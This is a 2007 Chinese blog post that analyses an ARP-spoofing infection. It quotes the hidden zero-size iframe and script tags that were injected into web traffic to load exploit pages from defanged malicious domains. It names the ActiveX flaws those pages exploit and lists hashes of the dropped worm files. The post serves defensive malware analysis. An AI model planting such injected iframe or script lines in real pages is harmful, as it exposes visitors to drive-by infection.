ARP病毒所加网址传播Worm.Win32.Anilogo,Win32.Logogo.q等

最新推荐文章于 2022-12-16 19:01:26 发布
最新推荐文章于 2022-12-16 19:01:26 发布
阅读量2.5k 收藏
点赞数
分类专栏: 系统安全 文章标签: iframe 路由器 网络 c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/1944419
版权

ARP病毒所加网址传播Worm.Win32.Anilogo,Win32.Logogo.q等

endurer 原创
2007-12-17 第1

一位网友说他孤电脑网络路由器DHCP获取不到ip地址,网速超慢,重新连接路由器后打开所有网站,Kaspersky 报告:
/---
2007-12-14 17:45:23 恶意 HTTP 对象 <hxxp://***.8***v*8.biz/2.htm>: 已检测 木马程序 Trojan-Downloader.JS.Psyme.ck.
2007-12-14 17:45:26 恶意 HTTP 对象 <hxxp://***.8***v*8.biz/index.html>: 已检测 恶意程序 Exploit.Win32.Agent.bb.
---/
并提示:攻击:端口139 或445和局域网中攻击者的ip;网中的一些计算机出现提示信息然后自动重启的现象。

查看代码,发现代码:
/---
<iframe src=index.html width=0 height=0></iframe>
<iframe src=2.htm width=0 height=0></iframe>
<iframe src=xl.htm width=0 height=0></iframe>  
---/

hxxp://***.8***v*8.biz/index.html 包含 Real 漏洞利用代码。
其中一句代码为:PayLoad += "ChuiZi";

hxxp://***.8***v*8.biz/2.htm 为利用BaiduBar.Tool下载4.CAB。

4.CAB包含文件r.exe:

文件说明符 : D:/temp/r.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-24 0:16:18
修改时间 : 2007-11-24 0:16:18
访问时间 : 2007-12-14 22:11:3
大小 : 18326 字节 17.918 KB
MD5 : 2a30052c2cdf9af72008aaf6bec12720
SHA1: 648DF9D731439E9348278FAE9DCC063505CDFE13
CRC32: 91cc38b4

Kaspersky 报为 Worm.Win32.Anilogo.b,瑞星报为 Win32.Logogo.c
并输出代码:
/---
<script src=hxxp://***.9**g*g**.biz/0614.js></script>
<script src=hxxp://***.9**g*g**.biz/MPS.js></script>
<script src=hxxp://***.9**g*g**.biz/PowerPlayerCtrl.js></script>
---/

hxxp://***.9**g*g**.biz/0614.js 利用ado.stream漏洞 下载 hxxp://***.9**g*g**.biz/real.exe。
文件说明符 : D:/test/real.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-12-14 21:58:51
修改时间 : 2007-12-14 21:58:51
访问时间 : 2007-12-14 22:7:3
大小 : 19122 字节 18.690 KB
MD5 : 24019d60bfe840c82ac8259a2dfb88dc
SHA1: B299F4A14DF7393ED9F96E58EB379E9B1D21D091
CRC32: 5f5bfae8

Kaspersky 报为 Worm.Win32.AutoRun.apj,瑞星报为 Win32.Logogo.q

hxxp://***.9**g*g**.biz/MPS.js 为暴风影音2的activex漏洞利用代码

hxxp://***.9**g*g**.biz/PowerPlayerCtrl.js 为PPstream漏洞利用代码

view-source:hxxp://***.8***v*8.biz/xl.htm 为迅雷PPLAYER.DLL_1_WORK ActiveX控件缓冲区溢出漏洞利用代码

迅雷PPLAYER.DLL_1_WORK ActiveX控件缓冲区溢出漏洞
hxxp://www.nsfocus.net/vulndb/11201

紫郢剑侠
关注
专栏目录
[网络安全自学篇] 七十三.WannaCry勒索病毒复现及分析(四)蠕虫传播机制全网源码详细解读
杨秀璋的专栏
05-05 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析OllyDbg动态调试工具的基本用法,包括界面介绍、常用快捷键和TraceMe案例分析。这篇文章将继续详细讲解WannaCry蠕虫的传播机制,带领大家详细阅读源代码,分享WannaCry勒索病毒是如何传播感染的。作者分析该病毒一个月,一方面觉得自己技术菜,另一方面深知系统安全需要坚持,继续加油。希望文章对您有所帮助~
关于勒索病毒 Ransom:Win32.WannaCrypt 解决方案的最后一次说明
dotNET跨平台
05-16 6905
2017/5/12 晚,勒索软件 Ransom:Win32.WannaCrypt 大面积暴发。比病毒爆发更火的,则是各类关于此病毒的新闻、解决方法在朋友圈等社交媒体的爆发。 其中,有主观善意但客观一知半解的指导,更有夹带私货的安全软件商携各类工具的广告宣传,以及各大小 IT 公司借此做的宣传。 一时间,众多群众不知所措,战战兢兢;不惜在自己的网络中将各种帖子所支招数悉数执行
病毒之Worm.Win32.AutoRun
最新发布
BYTEDANCE的博客
12-16 5304
解决Worm.Win32.AutoRun之暴力删除 Autorun.inf 文件,那年我双手插兜,不知道什么叫做对手
最新勒索软件WannaCrypt病毒感染前后应对措施
wodafa的博客
05-17 7484
这波勒索病毒使用的是今年3月爆发的NSA暴露的那些漏洞利用工具,当时出来以后,如果及时对系统更新了漏洞补丁和加固后,系统基本不会被感染
Windows勒索病毒补丁下载
热门推荐
似水无痕
05-14 3万+
微软在3月份已经针对NSA泄漏的漏洞发布了MS17-010升级补丁,包括本次被敲诈者蠕虫病毒利用的“永恒之蓝”漏洞,同时针对停止支持的Windows XP、Windows Server 2003、Windows 8也发布了专门的修复补丁。 最新版的Windows 10 1703创意者更新已经不存在此漏洞,不需要补丁。 各系统补丁官方下载地址如下: 【KB4012598】:http://www
WannaCry(永恒之蓝)病毒处理方法
weixin_34132768的博客
05-17 2911
1.直接关闭server服务 打开cmd执行关闭server服务即可: net stop server 控制面板--管理工具--服务里手动关掉   2.防火墙限制445端口       3.打补丁 【KB4012598】:http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598 适用于Windows XP 32位...
Net-Worm.Win32.Kido.ih 专杀工具
06-07
Net-Worm.Win32.Kido.ih 是一种广泛传播的蠕虫病毒,它主要通过网络进行扩散,对用户的计算机系统安全构成严重威胁。这个病毒能够影响Windows操作系统,导致各种问题,比如网络连接受阻,尤其是可能导致无法访问微软...
net.worm.win32.kido专杀工具
06-25
2、从系统注册表项中删除如下所示"%System%\<rnd>.dll": [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost] "netsvcs" 3、重新启动计算机。 4、删除蠕虫文件(位置取决于恶意程序如何侵入计算机) 。 ...
delphi Email-Worm.Win32.Canbis
05-02
delphi Email-Worm.Win32.Canbis
病毒Net-Worm.Win32.Kido.ih 清除方法
02-22
### 病毒Net-Worm.Win32.Kido.ih清除方法详解 #### 知识点一:Net-Worm.Win32.Kido.ih病毒概述 - **定义**:Net-Worm.Win32.Kido.ih是一种网络蠕虫病毒,通过网络传播并在目标计算机上执行恶意操作。 - **传播方式*...
Win32/Conficker.AA蠕虫搜集资料
02-04
Win32/Conficker.AA蠕虫是一种恶性网络病毒,主要通过利用微软Windows Server服务的RPC(Remote Procedure Call)处理中的远程代码执行漏洞进行传播。这个漏洞被标识为MS08-067,是微软历史上最知名的漏洞之一。蠕虫...
WannaCryptor 勒索蠕虫样本深度技术分析
肖飞figo的云计算专栏
05-15 3213
注:以下文章转自Anti Wann Dcryptor联盟: http://www.wannadecryptor.cn/ 一、 WannaCryptor 是如何传播? WanaCrypotor在几周之前就被发现了,但是这款恶意勒索软件传播速度没那么严重,是什么造成了传播如此之快? ETERNALBLUE ,永恒之蓝,这个是影子经纪人泄露的NSA攻击工具,攻击wind
勒索病毒WannaCry深度技术分析——详解传播、感染和危害细节
liujiayu2的专栏
09-07 2415
一、综述        5月12日,全球爆发的勒索病毒WannaCry借助高危漏洞“永恒之蓝”(EternalBlue)在世界范围内爆发,据报道包括美国、英国、中国、俄罗斯、西班牙、意大利、越南等百余个国家均遭受大规模攻击。我国的许多行业机构和大型企业也被攻击,有的单位甚至“全军覆没”,损失之严重为近年来所罕见。 本报告将从传播途径、危害方式和结果、受威胁用户群等角度,逐一厘清这个恶性病毒
wannacry蠕虫相关汇总知识
skylinelulu的博客
05-15 2032
前两天wannacry席卷全球,在国内也引起了大量关注,国内安全厂商对此也进行了相关分析,于是趁此机会想记录一下相关知识,主要是汇总技术报告。 一、SMB远程攻击漏洞 北京时间2月2日,国外技术网站Github曝光了Windows SMBv3存在远程攻击0day漏洞。根据已公开的漏洞验证代码(POC),攻击者可以迫使受影响系统蓝屏崩溃,此漏洞也存在进一步远程执行代码的高危风险。
Net-Worm.Win32.Kido 专杀
02-18
Net-Worm.Win32.Kido 专杀
delphi Virus.Win32.HLLW.Delf.k.
05-02
标题 "delphi Virus.Win32.HLLW.Delf.k." 指的是一种特定的计算机病毒,它属于 Delphi 编程语言编写并且在 Windows 32 位平台上运行的 HLLW(High Level Language Worm)类病毒。这种病毒通常会自我复制并利用系统...
解决Worm.Win32.AutoRun.soq 病毒
LaySolitary的博客
06-05 5558
X: 回车  X盘符1.搜索attrib –s –r –a –h autorun.inf2.删除del autorun.inf3.回复文件attrib -H -S X:\* /s /d
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值